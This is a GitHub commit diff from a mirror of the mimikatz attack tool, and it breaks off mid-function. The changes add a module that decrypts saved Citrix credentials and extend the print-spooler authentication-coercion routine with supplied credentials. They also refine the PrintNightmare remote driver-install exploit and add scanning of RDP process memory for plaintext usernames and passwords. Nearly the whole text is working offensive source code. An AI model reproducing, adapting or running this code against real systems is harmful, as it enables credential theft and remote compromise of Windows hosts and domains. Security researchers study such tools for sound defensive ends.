1
0
mirror of https://github.com/gentilkiwi/mimikatz synced 2025-03-18 08:31:40 +00:00

Merge branch 'gentilkiwi:master' into master

This commit is contained in:
hubert3 2022-07-21 12:30:19 +10:00 committed by GitHub
commit a952a601b5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
35 changed files with 1071 additions and 271 deletions

View File

@ -118,7 +118,7 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
#define KULL_M_WIN_BUILD_10_1909 18363
#define KULL_M_WIN_BUILD_10_2004 19041
#define KULL_M_WIN_BUILD_10_20H2 19042
#define KULL_M_WIN_BUILD_2022 20348
#define KULL_M_WIN_MIN_BUILD_XP 2500
#define KULL_M_WIN_MIN_BUILD_2K3 3000
@ -126,4 +126,5 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
#define KULL_M_WIN_MIN_BUILD_7 7000
#define KULL_M_WIN_MIN_BUILD_8 8000
#define KULL_M_WIN_MIN_BUILD_BLUE 9400
#define KULL_M_WIN_MIN_BUILD_10 9800
#define KULL_M_WIN_MIN_BUILD_10 9800
#define KULL_M_WIN_MIN_BUILD_11 22000

View File

@ -173,6 +173,7 @@
<ClCompile Include="modules\dpapi\kuhl_m_dpapi.c" />
<ClCompile Include="modules\dpapi\kuhl_m_dpapi_oe.c" />
<ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_chrome.c" />
<ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_citrix.c" />
<ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_cloudap.c" />
<ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_creds.c" />
<ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_keys.c" />
@ -289,6 +290,7 @@
<ClInclude Include="modules\dpapi\kuhl_m_dpapi.h" />
<ClInclude Include="modules\dpapi\kuhl_m_dpapi_oe.h" />
<ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_chrome.h" />
<ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_citrix.h" />
<ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_cloudap.h" />
<ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_creds.h" />
<ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_keys.h" />

View File

@ -329,6 +329,9 @@
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-efsr_c.c">
<Filter>common modules\rpc</Filter>
</ClCompile>
<ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_citrix.c">
<Filter>local modules\dpapi\packages</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="mimikatz.h" />
@ -677,6 +680,9 @@
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-efsr.h">
<Filter>common modules\rpc</Filter>
</ClInclude>
<ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_citrix.h">
<Filter>local modules\dpapi\packages</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<Filter Include="local modules">

View File

@ -27,6 +27,7 @@ const KUHL_M_C kuhl_m_c_dpapi[] = {
{kuhl_m_dpapi_cloudap_keyvalue_derived, L"cloudapkd", L""},
{kuhl_m_dpapi_cloudap_fromreg, L"cloudapreg", L""},
{kuhl_m_dpapi_sccm_networkaccessaccount, L"sccm", L""},
{kuhl_m_dpapi_citrix, L"citrix", L""},
{kuhl_m_dpapi_oe_cache, L"cache", NULL},
};
const KUHL_M kuhl_m_dpapi = {

View File

@ -20,6 +20,7 @@
#include "packages/kuhl_m_dpapi_lunahsm.h"
#include "packages/kuhl_m_dpapi_cloudap.h"
#include "packages/kuhl_m_dpapi_sccm.h"
#include "packages/kuhl_m_dpapi_citrix.h"
const KUHL_M kuhl_m_dpapi;

View File

@ -0,0 +1,89 @@
/* Benjamin DELPY `gentilkiwi`
https://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kuhl_m_dpapi_citrix.h"
const char CITRIX_SAVED_CREDENTIALS_GUID[] = "{921BB3E1-15EE-4bbe-83D4-C4CE176A481B}";
NTSTATUS kuhl_m_dpapi_citrix(int argc, wchar_t * argv[])
{
PKULL_M_REGISTRY_HANDLE hRegistry;
PBYTE pbData;
DWORD cbData;
LPCWSTR szData;
LPWSTR szGuid = NULL, szUrl, szBase64, szSavedCreds;
LPSTR sEntropy;
IXMLDOMDocument *pXMLDom;
IXMLDOMNode *pNode;
LPVOID pDataOut;
DWORD dwDataOutLen;
if(kull_m_string_args_byName(argc, argv, L"guid", &szData, NULL))
{
kull_m_string_copy(&szGuid, szData);
}
else if(kull_m_registry_open(KULL_M_REGISTRY_TYPE_OWN, NULL, FALSE, &hRegistry)) // todo: offline
{
//For v3, KEY_WOW64_32KEY
kull_m_registry_OpenAndQueryWithAlloc(hRegistry, HKEY_LOCAL_MACHINE, L"SOFTWARE\\"
#if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
L"WOW6432Node\\"
#endif
L"Citrix\\AuthManager", L"Guid", NULL, (LPVOID *) &szGuid, NULL);
kull_m_registry_close(hRegistry);
}
if(szGuid)
{
kprintf(L"Citrix instance GUID : %s\n", szGuid);
if(kull_m_string_args_byName(argc, argv, L"in", &szData, NULL))
{
kprintf(L"Using saved data from: %s\n", szData);
if(pXMLDom = kull_m_xml_CreateAndInitDOM())
{
if(kull_m_xml_LoadXMLFile(pXMLDom, szData))
{
if((IXMLDOMDocument_selectSingleNode(pXMLDom, (BSTR) L"//Data/Item", &pNode) == S_OK) && pNode)
{
szUrl = kull_m_xml_getAttribute(pNode, L"url");
if(szUrl)
{
kprintf(L"URL: %s\n", szUrl);
kull_m_string_sprintfA(&sEntropy, "%S%s%S", szUrl, CITRIX_SAVED_CREDENTIALS_GUID, szGuid);
if(sEntropy)
{
if(IXMLDOMNode_get_text(pNode, &szBase64) == S_OK)
{
if(kull_m_string_quick_base64_to_Binary(szBase64, &pbData, &cbData))
{
if(kuhl_m_dpapi_unprotect_raw_or_blob(pbData, cbData, NULL, argc, argv, sEntropy, lstrlenA(sEntropy), &pDataOut, &dwDataOutLen, NULL))
{
if(kull_m_string_copy_len(&szSavedCreds, (LPCWSTR) pDataOut, dwDataOutLen / sizeof(wchar_t)))
{
UrlUnescapeInPlace(szSavedCreds, 0);
kprintf(L" > Saved data: %s\n", szSavedCreds);
LocalFree(szSavedCreds);
}
LocalFree(pDataOut);
}
}
SysFreeString(szBase64);
}
LocalFree(sEntropy);
}
LocalFree(szUrl);
}
}
}
kull_m_xml_ReleaseDom(pXMLDom);
}
}
else PRINT_ERROR(L"Input Citrix saved data needed (/in:%%localappdata%%\\Citrix\\AuthManager\\Data\\<file.dat>)\n");
LocalFree(szGuid);
}
else PRINT_ERROR(L"No instance GUID ? (use /guid:xxx (without {} to specify\n");
return STATUS_SUCCESS;
}

View File

@ -0,0 +1,9 @@
/* Benjamin DELPY `gentilkiwi`
https://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#pragma once
#include "../kuhl_m_dpapi.h"
NTSTATUS kuhl_m_dpapi_citrix(int argc, wchar_t * argv[]);

View File

@ -1342,58 +1342,127 @@ handle_t __RPC_USER STRING_HANDLE_bind(IN STRING_HANDLE Name) {return hSpoolHand
void __RPC_USER STRING_HANDLE_unbind(IN STRING_HANDLE Name, handle_t hSpool) {}
NTSTATUS kuhl_m_misc_spooler(int argc, wchar_t * argv[])
{
LPCWSTR szRemote, szCallbackTo;
LPWSTR szPathToCallback = NULL;
NTSTATUS status;
PRINTER_HANDLE hPrinter;
DEVMODE_CONTAINER Container = {0, NULL};
DWORD ret;
DWORD dwRet, AuthnSvc;
long ret = 0;
NETRESOURCE nr = {0, RESOURCETYPE_DISK, 0, 0, NULL, NULL, NULL, NULL};
LPCWSTR szUser, szPassword, szRemote = NULL, szEndpoint, szCallbackTo;
PWSTR szPathToCallback;
SEC_WINNT_AUTH_IDENTITY secIdentity = {NULL, 0, NULL, 0, NULL, 0, SEC_WINNT_AUTH_IDENTITY_UNICODE};
if(kull_m_string_args_byName(argc, argv, L"authuser", &szUser, NULL))
{
AuthnSvc = RPC_C_AUTHN_GSS_NEGOTIATE;
kprintf(L"[auth ] Explicit authentication\n");
kprintf(L"[auth ] Username: %s\n", szUser);
secIdentity.User = (USHORT *) szUser;
secIdentity.UserLength = lstrlen(szUser);
if(kull_m_string_args_byName(argc, argv, L"authpassword", &szPassword, NULL))
{
kprintf(L"[auth ] Password: %s\n", szPassword);
secIdentity.Password = (USHORT *) szPassword;
secIdentity.PasswordLength = lstrlen(szPassword);
}
}
else if(kull_m_string_args_byName(argc, argv, L"noauth", NULL, NULL))
{
AuthnSvc = RPC_C_AUTHN_NONE;
kprintf(L"[auth ] None\n");
szUser = szPassword = L"";
}
else
{
AuthnSvc = RPC_C_AUTHN_DEFAULT;
kprintf(L"[auth ] Default (current)\n");
szUser = szPassword = NULL;
}
kull_m_string_args_byName(argc, argv, L"endpoint", &szEndpoint, L"\\pipe\\spoolss");
kprintf(L"[ rpc ] Endpoint: %s\n", szEndpoint);
if(kull_m_string_args_byName(argc, argv, L"server", &szRemote, NULL) || kull_m_string_args_byName(argc, argv, L"target", &szRemote, NULL))
{
if(kull_m_string_args_byName(argc, argv, L"connect", &szCallbackTo, NULL) || kull_m_string_args_byName(argc, argv, L"callback", &szCallbackTo, NULL))
{
if(kull_m_string_sprintf(&szPathToCallback, L"\\\\%s", szCallbackTo))
if(kull_m_string_sprintf(&nr.lpRemoteName, L"\\\\%s\\IPC$", szRemote))
{
kprintf(L"[info] %s will try to connect to %s\\IPC$\n\n", szRemote, szPathToCallback);
if(kull_m_rpc_createBinding(NULL, L"ncacn_np", szRemote, L"\\pipe\\spoolss", L"spooler", TRUE, RPC_C_AUTHN_DEFAULT, NULL, RPC_C_IMP_LEVEL_DEFAULT, &hSpoolHandle, NULL))
if(kull_m_string_sprintf(&szPathToCallback, L"\\\\%s", szCallbackTo))
{
RpcTryExcept
kprintf(L"[trans] Disconnect eventual IPC: ");
dwRet = WNetCancelConnection2(nr.lpRemoteName, 0, TRUE);
if((dwRet == NO_ERROR) || (dwRet == ERROR_NOT_CONNECTED))
{
ret = RpcOpenPrinter(NULL, &hPrinter, NULL, &Container, GENERIC_READ);
if(ret == ERROR_SUCCESS)
kprintf(L"OK\n[trans] Connect to IPC: ");
dwRet = WNetAddConnection2(&nr, szPassword, szUser, CONNECT_TEMPORARY);
if(dwRet == NO_ERROR)
{
ret = RpcRemoteFindFirstPrinterChangeNotification(hPrinter, PRINTER_CHANGE_ALL, PRINTER_NOTIFY_CATEGORY_ALL, szPathToCallback, 42, 0, NULL);
if(ret == ERROR_SUCCESS)
kprintf(L"OK\n");
if(kull_m_rpc_createBinding(NULL, L"ncacn_np", szRemote, szEndpoint, L"spooler", TRUE, AuthnSvc, secIdentity.UserLength ? &secIdentity : NULL, RPC_C_IMP_LEVEL_DEFAULT, &hSpoolHandle, NULL))
{
kprintf(L"Connected to the target, and notification is OK (?!)\n");
ret = RpcFindClosePrinterChangeNotification(hPrinter);
if(ret != ERROR_SUCCESS)
kprintf(L"[ rpc ] Resolve Endpoint: ");
status = RpcEpResolveBinding(hSpoolHandle, &winspool_v1_0_c_ifspec);
if(status == RPC_S_OK)
{
PRINT_ERROR(L"RpcFindClosePrinterChangeNotification: 0x%08x\n", ret);
kprintf(L"OK\n\n");
RpcTryExcept
{
ret = RpcOpenPrinter(NULL, &hPrinter, NULL, &Container, GENERIC_READ);
if(ret == ERROR_SUCCESS)
{
ret = RpcRemoteFindFirstPrinterChangeNotification(hPrinter, PRINTER_CHANGE_ALL, PRINTER_NOTIFY_CATEGORY_ALL, szPathToCallback, 42, 0, NULL);
if(ret == ERROR_SUCCESS)
{
kprintf(L"Connected to the target, and notification is OK (?!)\n");
ret = RpcFindClosePrinterChangeNotification(hPrinter);
if(ret != ERROR_SUCCESS)
{
PRINT_ERROR(L"RpcFindClosePrinterChangeNotification: 0x%08x\n", ret);
}
}
else if(ret == ERROR_ACCESS_DENIED)
{
kprintf(L"Access is denied (can be OK)\n");
}
else PRINT_ERROR(L"RpcRemoteFindFirstPrinterChangeNotification: 0x%08x\n", ret);
ret = RpcClosePrinter(&hPrinter);
if(ret != ERROR_SUCCESS)
{
PRINT_ERROR(L"RpcClosePrinter: 0x%08x\n", ret);
}
}
else PRINT_ERROR(L"RpcOpenPrinter: 0x%08x\n", ret);
}
RpcExcept(RPC_EXCEPTION)
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
RpcEndExcept
kprintf(L"\n");
}
else PRINT_ERROR(L"RpcEpResolveBinding: 0x%08x\n", status);
kull_m_rpc_deleteBinding(&hSpoolHandle);
}
else if(ret == ERROR_ACCESS_DENIED)
{
kprintf(L"Access is denied (can be OK)\n");
}
else PRINT_ERROR(L"RpcRemoteFindFirstPrinterChangeNotification: 0x%08x\n", ret);
ret = RpcClosePrinter(&hPrinter);
if(ret != ERROR_SUCCESS)
kprintf(L"[trans] Disconnect IPC: ");
dwRet = WNetCancelConnection2(nr.lpRemoteName, 0, TRUE);
if(dwRet == NO_ERROR)
{
PRINT_ERROR(L"RpcClosePrinter: 0x%08x\n", ret);
kprintf(L"OK\n");
}
else PRINT_ERROR(L"WNetCancelConnection2: 0x%08x\n");
}
else PRINT_ERROR(L"RpcOpenPrinter: 0x%08x\n", ret);
else PRINT_ERROR(L"WNetAddConnection2:%u\n", dwRet);
}
RpcExcept(RPC_EXCEPTION)
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
RpcEndExcept
else PRINT_ERROR(L"WNetCancelConnection2: %u\n", dwRet);
kull_m_rpc_deleteBinding(&hSpoolHandle);
LocalFree(szPathToCallback);
}
LocalFree(szPathToCallback);
LocalFree(nr.lpRemoteName);
}
}
else PRINT_ERROR(L"missing /connect argument to specify notifications target");
@ -1482,11 +1551,11 @@ NTSTATUS kuhl_m_misc_efs(int argc, wchar_t * argv[])
else if(ret == 0)
{
PRINT_ERROR(L"EfsRpcOpenFileRaw is a success, really? (not normal)\n");
EfsRpcCloseRaw(&hEfsHandle);
EfsRpcCloseRaw(&hImportCtx);
}
else
{
PRINT_ERROR(L"EfsRpcOpenFileRaw: ", ret);
PRINT_ERROR(L"EfsRpcOpenFileRaw: %u\n", ret);
}
}
RpcExcept(RPC_EXCEPTION)
@ -1589,7 +1658,7 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
DriverInfo.pEnvironment = bIsX64 ? L"Windows x64" : L"Windows NT x86";
if(kull_m_string_args_byName(argc, argv, L"library", &szLibrary, NULL))
{
if(kuhl_m_misc_printnightmare_normalize_library(szLibrary, &DriverInfo.pConfigFile, NULL))
if(kuhl_m_misc_printnightmare_normalize_library(bIsPar, szLibrary, &DriverInfo.pConfigFile, NULL))
{
szForce = kull_m_string_args_byName(argc, argv, L"useown", NULL, NULL) ? DriverInfo.pConfigFile : NULL;
@ -1600,7 +1669,13 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
{
if(kuhl_m_misc_printnightmare_FillStructure(&DriverInfo, bIsX64, !kull_m_string_args_byName(argc, argv, L"nodynamic", NULL, NULL), szForce, bIsPar, hSpoolHandle))
{
kuhl_m_misc_printnightmare_AddPrinterDriver(bIsPar, hSpoolHandle, &DriverInfo, APD_COPY_FROM_DIRECTORY | APD_COPY_NEW_FILES | APD_INSTALL_WARNED_DRIVER);
if(kuhl_m_misc_printnightmare_AddPrinterDriver(bIsPar, hSpoolHandle, &DriverInfo, APD_COPY_FROM_DIRECTORY | APD_COPY_NEW_FILES | APD_INSTALL_WARNED_DRIVER))
{
if(!bIsPar) // we can't remotely with normal user, use /clean with > rights
{
kuhl_m_misc_printnightmare_DeletePrinterDriver(bIsPar, hSpoolHandle, DriverInfo.pEnvironment, DriverInfo.pName);
}
}
LocalFree(DriverInfo.pDataFile);
LocalFree(DriverInfo.pDriverPath);
@ -1624,7 +1699,7 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
return STATUS_SUCCESS;
}
BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary)
BOOL kuhl_m_misc_printnightmare_normalize_library(BOOL bIsPar, LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary)
{
BOOL status = FALSE;
LPCWSTR szPtr;
@ -1641,7 +1716,14 @@ BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *psz
}
else
{
status = kull_m_string_copy(pszNormalizedLibrary, szLibrary);
if(!bIsPar)
{
status = kull_m_file_getAbsolutePathOf(szLibrary, pszNormalizedLibrary);
}
else
{
status = kull_m_string_copy(pszNormalizedLibrary, szLibrary);
}
}
if(status)
@ -1742,7 +1824,7 @@ BOOL kuhl_m_misc_printnightmare_FillStructure(PDRIVER_INFO_2 pInfo2, BOOL bIsX64
void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, BOOL bIsDelete)
{
DWORD i, ret, cReturned = 0;
DWORD i, cReturned = 0;
_PDRIVER_INFO_2 pDriverInfo;
PWSTR pName, pConfig;
@ -1759,28 +1841,7 @@ void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t
{
if(pName == wcsstr(pName, MIMIKATZ L"-"))
{
RpcTryExcept
{
if(bIsPar)
{
kprintf(L"> RpcAsyncDeletePrinterDriverEx: ");
ret = RpcAsyncDeletePrinterDriverEx(hRemoteBinding, NULL, (wchar_t *) szEnvironment, pName, DPD_DELETE_UNUSED_FILES, 0);
}
else
{
kprintf(L"> RpcDeletePrinterDriverEx: ");
ret = RpcDeletePrinterDriverEx(NULL, (wchar_t *) szEnvironment, pName, DPD_DELETE_UNUSED_FILES, 0);
}
if (ret == ERROR_SUCCESS)
{
kprintf(L"OK!\n");
}
else PRINT_ERROR(L"%u\n", ret);
}
RpcExcept(RPC_EXCEPTION)
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
RpcEndExcept
kuhl_m_misc_printnightmare_DeletePrinterDriver(bIsPar, hRemoteBinding, szEnvironment, pName);
}
}
}
@ -1789,8 +1850,9 @@ void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t
}
}
void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags)
BOOL kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags)
{
BOOL status = FALSE;
DWORD ret;
DRIVER_CONTAINER container_info;
@ -1813,6 +1875,7 @@ void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBi
if (ret == ERROR_SUCCESS)
{
status = TRUE;
kprintf(L"OK!\n");
}
else PRINT_ERROR(L"%u\n", ret);
@ -1820,6 +1883,40 @@ void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBi
RpcExcept(RPC_EXCEPTION)
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
RpcEndExcept
return status;
}
BOOL kuhl_m_misc_printnightmare_DeletePrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, LPCWSTR pName)
{
BOOL status = FALSE;
DWORD ret;
RpcTryExcept
{
if(bIsPar)
{
kprintf(L"> RpcAsyncDeletePrinterDriverEx: ");
ret = RpcAsyncDeletePrinterDriverEx(hRemoteBinding, NULL, (wchar_t *) szEnvironment, (wchar_t *) pName, DPD_DELETE_UNUSED_FILES, 0);
}
else
{
kprintf(L"> RpcDeletePrinterDriverEx: ");
ret = RpcDeletePrinterDriverEx(NULL, (wchar_t *) szEnvironment, (wchar_t *)pName, DPD_DELETE_UNUSED_FILES, 0);
}
if (ret == ERROR_SUCCESS)
{
status = TRUE;
kprintf(L"OK!\n");
}
else PRINT_ERROR(L"%u\n", ret);
}
RpcExcept(RPC_EXCEPTION)
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
RpcEndExcept
return status;
}
BOOL kuhl_m_misc_printnightmare_EnumPrinters(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, _PDRIVER_INFO_2 *ppDriverInfo, DWORD *pcReturned)

View File

@ -51,10 +51,11 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_misc_sccm_accounts(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_misc_shadowcopies(int argc, wchar_t * argv[]);
BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary);
BOOL kuhl_m_misc_printnightmare_normalize_library(BOOL bIsPar, LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary);
BOOL kuhl_m_misc_printnightmare_FillStructure(PDRIVER_INFO_2 pInfo2, BOOL bIsX64, BOOL bIsDynamic, LPCWSTR szForce, BOOL bIsPar, handle_t hRemoteBinding);
void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, BOOL bIsDelete);
void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags);
BOOL kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags);
BOOL kuhl_m_misc_printnightmare_DeletePrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, LPCWSTR pName);
BOOL kuhl_m_misc_printnightmare_EnumPrinters(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, _PDRIVER_INFO_2 *ppDriverInfo, DWORD *pcReturned);
BOOL CALLBACK kuhl_m_misc_detours_callback_process(PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation, PVOID pvArg);

View File

@ -645,7 +645,7 @@ NTSTATUS kuhl_m_net_trust(int argc, wchar_t * argv[])
else PRINT_ERROR(L"DsEnumerateDomainTrusts: %u\n", ret);
kprintf(L"\n\nLDAP mode: ");
if(kull_m_ldap_getLdapAndRootDN(server, L"defaultNamingContext", &ld, &dn))
if(kull_m_ldap_getLdapAndRootDN(server, L"defaultNamingContext", &ld, &dn, NULL))
{
if(kull_m_string_sprintf(&sysDN, L"CN=System,%s", dn))
{
@ -761,7 +761,7 @@ L")";
BOOL isCheckDNS = kull_m_string_args_byName(argc, argv, L"dns", NULL, NULL);
kull_m_string_args_byName(argc, argv, L"server", &server, NULL);
if(kull_m_ldap_getLdapAndRootDN(server, NULL, &ld, &dn))
if(kull_m_ldap_getLdapAndRootDN(server, NULL, &ld, &dn, NULL))
{
dwRet = ldap_search_s(ld, dn, LDAP_SCOPE_SUBTREE, filter, myAttrs, FALSE, &pMessage);
if(dwRet == LDAP_SUCCESS)

View File

@ -317,7 +317,7 @@ BOOL kuhl_m_sid_quickSearch(int argc, wchar_t * argv[], BOOL needUnique, PCWCHAR
PWCHAR myAttrs[] = {L"name", L"sAMAccountName", L"objectSid", L"sIDHistory", L"objectGUID", NULL}, dn, filter;
if(filter = kuhl_m_sid_filterFromArgs(argc, argv))
{
if(kull_m_ldap_getLdapAndRootDN(system, NULL, ld, &dn))
if(kull_m_ldap_getLdapAndRootDN(system, NULL, ld, &dn, NULL))
{
*pMessage = NULL;
dwErr = ldap_search_s(*ld, dn, LDAP_SCOPE_SUBTREE, filter, myAttrs, FALSE, pMessage);

View File

@ -204,12 +204,15 @@ NTSTATUS kuhl_m_ts_logonpasswords(int argc, wchar_t * argv[])
const BYTE MyPattern[] = {0x00, 0x00, 0x00, 0x00, 0xbb, 0x47, /*0x0b, 0x00*/};
const BYTE MyPattern2[] = {0x00, 0x00, 0x00, 0x00, 0xf3, 0x47, /*0x0b, 0x00*/};
const BYTE MyPattern3[] = {0x00, 0x00, 0x00, 0x00, 0x3b, 0x01};
const BYTE MyWebPattern[] = {0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
BOOL CALLBACK kuhl_m_ts_logonpasswords_MemoryAnalysis(PMEMORY_BASIC_INFORMATION pMemoryBasicInformation, PVOID pvArg)
{
KULL_M_MEMORY_ADDRESS aLocalBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aProcess = {pMemoryBasicInformation->BaseAddress, (PKULL_M_MEMORY_HANDLE) pvArg};
PBYTE CurrentPtr, limite;
PBYTE CurrentPtr, limite, ref;
PWTS_KIWI pKiwiData;
BOOL decStatus = TRUE, bIsCandidate;
PWTS_WEB_KIWI pWebKiwiData;
BOOL decStatus, bIsCandidate;
DWORD dwOffset;
if((pMemoryBasicInformation->Type == MEM_PRIVATE) && (pMemoryBasicInformation->State != MEM_FREE) && (pMemoryBasicInformation->Protect == PAGE_READWRITE))
{
@ -218,7 +221,7 @@ BOOL CALLBACK kuhl_m_ts_logonpasswords_MemoryAnalysis(PMEMORY_BASIC_INFORMATION
{
if(kull_m_memory_copy(&aLocalBuffer, &aProcess, pMemoryBasicInformation->RegionSize))
{
for(CurrentPtr = (PBYTE) aLocalBuffer.address, limite = (PBYTE) aLocalBuffer.address + pMemoryBasicInformation->RegionSize; CurrentPtr + sizeof(MyPattern) <= limite; CurrentPtr++)
for(CurrentPtr = (PBYTE) aLocalBuffer.address, limite = (PBYTE) aLocalBuffer.address + pMemoryBasicInformation->RegionSize; CurrentPtr + sizeof(MyWebPattern) <= limite; CurrentPtr += sizeof(PVOID))
{
pKiwiData = (PWTS_KIWI) CurrentPtr;
@ -232,31 +235,91 @@ BOOL CALLBACK kuhl_m_ts_logonpasswords_MemoryAnalysis(PMEMORY_BASIC_INFORMATION
}
else bIsCandidate = FALSE;
if(bIsCandidate && !pKiwiData->unk2)
if(bIsCandidate)
{
//kprintf(L"-> %08x (%hu %hu %hu)\n", pKiwiData->unk1, pKiwiData->cbDomain, pKiwiData->cbUsername, pKiwiData->cbPassword);
if(!(pKiwiData->cbDomain & 1) && (pKiwiData->cbDomain < sizeof(pKiwiData->Domain)))
if(!pKiwiData->unk2)
{
if(!(pKiwiData->cbUsername & 1) && (pKiwiData->cbUsername > sizeof(wchar_t)) && (pKiwiData->cbUsername < sizeof(pKiwiData->UserName)))
//kprintf(L"-> %08x (%hu %hu %hu)\n", pKiwiData->unk1, pKiwiData->cbDomain, pKiwiData->cbUsername, pKiwiData->cbPassword);
if(!(pKiwiData->cbDomain & 1) && (pKiwiData->cbDomain < sizeof(pKiwiData->Domain)))
{
if(!(pKiwiData->cbPassword & 1) && (pKiwiData->cbPassword < sizeof(pKiwiData->Password)))
if(!(pKiwiData->cbUsername & 1) && (pKiwiData->cbUsername > sizeof(wchar_t)) && (pKiwiData->cbUsername < sizeof(pKiwiData->UserName)))
{
kprintf(
L"\n Domain : %.*s\n"
L" UserName : %.*s\n",
pKiwiData->cbDomain / sizeof(wchar_t), pKiwiData->Domain,
pKiwiData->cbUsername/ sizeof(wchar_t), pKiwiData->UserName
);
if(pKiwiData->cbPassword && (MIMIKATZ_NT_BUILD_NUMBER >= KULL_M_WIN_MIN_BUILD_10))
if(!(pKiwiData->cbPassword & 1) && (pKiwiData->cbPassword < sizeof(pKiwiData->Password)))
{
decStatus = kull_m_crypto_remote_CryptUnprotectMemory(aProcess.hMemory, pKiwiData->Password, sizeof(pKiwiData->Password), CRYPTPROTECTMEMORY_SAME_PROCESS);
}
kprintf(
L"\n Domain : %.*s\n"
L" UserName : %.*s\n",
pKiwiData->cbDomain / sizeof(wchar_t), pKiwiData->Domain,
pKiwiData->cbUsername / sizeof(wchar_t), pKiwiData->UserName
);
if(pKiwiData->cbPassword && (MIMIKATZ_NT_BUILD_NUMBER >= KULL_M_WIN_MIN_BUILD_10))
{
decStatus = kull_m_crypto_remote_CryptUnprotectMemory(aProcess.hMemory, pKiwiData->Password, sizeof(pKiwiData->Password), CRYPTPROTECTMEMORY_SAME_PROCESS);
}
else decStatus = TRUE;
if(decStatus)
{
kprintf(L" Password/Pin: %.*s\n", pKiwiData->cbPassword / sizeof(wchar_t), pKiwiData->Password);
}
}
}
}
}
}
else if(RtlEqualMemory(MyWebPattern, CurrentPtr, sizeof(MyWebPattern)))
{
pWebKiwiData = (PWTS_WEB_KIWI) CurrentPtr;
if(
(pWebKiwiData->Username.Buffer && !((ULONG_PTR) pWebKiwiData->Username.Buffer % 2) && ((ULONG_PTR) pWebKiwiData->Username.Buffer < 0x1000))
&&
(pWebKiwiData->Username.Length && !(pWebKiwiData->Username.Length % sizeof(wchar_t)) && (pWebKiwiData->Username.Length < ((WTS_USERNAME_LENGTH + 1) * sizeof(wchar_t))) && ((pWebKiwiData->Username.Length == pWebKiwiData->Username.MaximumLength) || (pWebKiwiData->Username.Length == (pWebKiwiData->Username.MaximumLength - sizeof(wchar_t)))))
)
{
if(
